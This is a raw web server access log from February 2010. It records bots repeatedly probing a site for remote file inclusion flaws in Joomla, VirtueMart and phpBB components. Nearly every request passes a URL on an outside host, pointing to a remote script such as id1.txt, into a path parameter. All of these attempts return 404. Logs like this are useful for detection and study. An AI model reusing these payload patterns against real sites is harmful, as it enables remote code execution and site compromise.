58.150.99.131 - - [07/Feb/2010:05:43:13 -0800] "GET /logs/access_100110.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [07/Feb/2010:05:43:16 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [07/Feb/2010:05:43:18 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [07/Feb/2010:05:43:20 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [07/Feb/2010:05:43:20 -0800] "GET /logs/access_100110.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [07/Feb/2010:05:43:27 -0800] "GET /logs/access_100122.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [07/Feb/2010:05:43:36 -0800] "GET /logs/access_100122.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:44:01 -0800] "GET /logs/access_100111.log%20%20//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [07/Feb/2010:05:44:02 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:44:05 -0800] "GET /logs/access_100111.log%20%20//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [07/Feb/2010:05:44:06 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [07/Feb/2010:05:44:11 -0800] "GET /logs/access_100122.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [07/Feb/2010:05:44:12 -0800] "GET /logs/access_100110.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:46:30 -0800] "GET /logs/access_100111.log%20%20//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.221.91.55 - - [07/Feb/2010:05:46:46 -0800] "GET /export.php?mosConfig.absolute.path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
66.221.91.55 - - [07/Feb/2010:05:46:46 -0800] "GET /logs/export.php?mosConfig.absolute.path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:48:50 -0800] "GET /logs/access_100126.log//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:48:59 -0800] "GET /logs/access_100111.log//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:05:50:27 -0800] "GET /logs/access.log/write_update.php?board_skin_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:05:50:31 -0800] "GET /logs/access_100119.log/write_update.php?board_skin_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:52:31 -0800] "GET /logs/access_100126.log//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:52:38 -0800] "GET /logs/access_100126.log//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:52:41 -0800] "GET /logs/access_100111.log//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:53:12 -0800] "GET /logs/access_100111.log//v2//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:53:44 -0800] "GET /logs/access_100121.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:53:44 -0800] "GET /delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:53:44 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:53:47 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:53:48 -0800] "GET /logs/access_100121.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:53:48 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:53:48 -0800] "GET /delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:53:53 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:54:10 -0800] "GET /logs/access_100121.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:54:10 -0800] "GET /delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:54:10 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:54:16 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:54:37 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:54:38 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:54:38 -0800] "GET /logs/access_100129.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:54:38 -0800] "GET /logs/access_100110.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:54:50 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:54:50 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:54:50 -0800] "GET /logs/access_100129.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:54:51 -0800] "GET /logs/access_100110.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [07/Feb/2010:05:55:06 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://jok3rcrew.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [07/Feb/2010:05:55:06 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://jok3rcrew.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [07/Feb/2010:05:55:06 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://jok3rcrew.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:55:10 -0800] "GET /delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:55:10 -0800] "GET /logs/access_100121.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:55:10 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:55:13 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [07/Feb/2010:05:55:20 -0800] "GET /diger HTTP/1.0" 301 74 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [07/Feb/2010:05:55:22 -0800] "GET /diger/ HTTP/1.0" 200 3529 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [07/Feb/2010:05:55:23 -0800] "GET /style/5.style.css HTTP/1.0" 200 2407 "http://www.puaga.com/diger/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [07/Feb/2010:05:55:23 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/diger/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:05:56:16 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:05:56:16 -0800] "GET /logs/access_100117.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:05:56:16 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:56:25 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:56:25 -0800] "GET /delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:56:25 -0800] "GET /logs/access_100121.log%20%20//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.157 - - [07/Feb/2010:05:56:29 -0800] "GET /logs/access_100123.log%20%20//component/option,com_frontpage//index.php?mosConfig.absolute.path=http://bipumnara.co.kr/start/data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.157 - - [07/Feb/2010:05:56:29 -0800] "GET /component/option,com_frontpage//index.php?mosConfig.absolute.path=http://bipumnara.co.kr/start/data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.157 - - [07/Feb/2010:05:56:29 -0800] "GET /logs//component/option,com_frontpage//index.php?mosConfig.absolute.path=http://bipumnara.co.kr/start/data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:56:34 -0800] "GET /logs/access_100121.log%20%20//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:56:34 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:56:34 -0800] "GET /delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:56:50 -0800] "GET /logs/access_100202.log%20%20//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:56:57 -0800] "GET /logs/access_100202.log%20%20//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:57:05 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:57:05 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:57:06 -0800] "GET /logs/access_100110.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:05:57:06 -0800] "GET /logs/access_100129.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:58:01 -0800] "GET /logs/access_100112.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:58:06 -0800] "GET /logs/access_100124.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:58:23 -0800] "GET /logs/access_100112.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:58:38 -0800] "GET /logs/access_100124.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.157 - - [07/Feb/2010:05:58:41 -0800] "GET /logs/access_100129.log%20%20//component/option,com_frontpage//index.php?mosConfig.absolute.path=http://bipumnara.co.kr/start/data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:59:35 -0800] "GET /logs/access_100112.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:05:59:46 -0800] "GET /logs/access_100124.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://musicadelibreria.net/header?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:59:51 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:59:51 -0800] "GET /logs/access_100202.log%20%20//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:59:51 -0800] "GET /logs/access_100202.log%20%20//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:59:51 -0800] "GET /delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:59:51 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:05:59:52 -0800] "GET /delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:00:01 -0800] "GET /logs/access_100129.log%20%20//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:00:11 -0800] "GET /logs/access_100129.log%20%20//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:06:00:16 -0800] "GET /logs//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:06:00:16 -0800] "GET /errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:06:00:17 -0800] "GET /logs/access_100111.log//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:06:00:22 -0800] "GET /logs/access_100108.log//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
213.171.37.206 - - [07/Feb/2010:06:00:33 -0800] "GET /logs//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [07/Feb/2010:06:00:38 -0800] "GET /logs/access_100122.log%20//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [07/Feb/2010:06:00:38 -0800] "GET /errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:00:56 -0800] "GET /logs/access_100127.log/errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:00:56 -0800] "GET /errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:00:56 -0800] "GET /logs/errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:00:57 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:00:57 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:00:57 -0800] "GET /logs/access_100108.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:01:00 -0800] "GET /logs/access_100129.log/errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
